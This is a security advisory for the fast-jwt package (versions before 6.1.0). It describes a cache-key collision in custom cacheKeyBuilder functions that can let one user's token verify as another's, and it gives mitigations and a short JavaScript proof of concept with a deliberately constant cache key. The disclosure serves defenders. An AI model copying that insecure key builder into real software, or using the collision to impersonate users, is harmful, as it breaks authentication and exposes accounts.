Improper Validation of Unsafe Equivalence in Input Affecting fast-jwt package, versions <6.1.0

fast-jwt is a Fast JSON Web Token implementation

Affected versions of this package are vulnerable to Improper Validation of Unsafe Equivalence in Input in the cacheKeyBuilder function when custom implementations do not generate unique keys for different tokens, leading to cache collisions. An attacker can gain unauthorized access to another user's identity and permissions by submitting a token that results in a cache key collision.

Note:

This is only exploitable if caching is enabled and a custom cacheKeyBuilder function is used that can produce identical keys for different tokens.

This vulnerability can be mitigated by ensuring the custom cacheKeyBuilder generates unique keys for each token, removing the custom cacheKeyBuilder, or disabling caching.

const { createSigner, createVerifier } = require('fast-jwt')

const sign = createSigner({ key: 'secret' })

// Two distinct tokens
const t1 = sign({ sub: 'userA', aud: 'admin' })
const t2 = sign({ sub: 'userB', aud: 'admin' })

// Deliberately unsafe cache key builder (collision)
const verify = createVerifier({
key: 'secret',
cache: true,
cacheKeyBuilder: () => 'static-key'
})

console.log('verify t1')
const p1 = verify(t1)
console.log('t1 PASS sub=', p1.sub)

console.log('verify t2')
const p2 = verify(t2)
console.log('t2 PASS sub=', p2.sub)

console.log('verify t2 again')
const p3 = verify(t2)
console.log('t2-again PASS sub=', p3.sub)

console.log('verify t1 again')
const p4 = verify(t1)
console.log('t1-again PASS sub=', p4.sub)

• GitHub Advisory
• GitHub Commit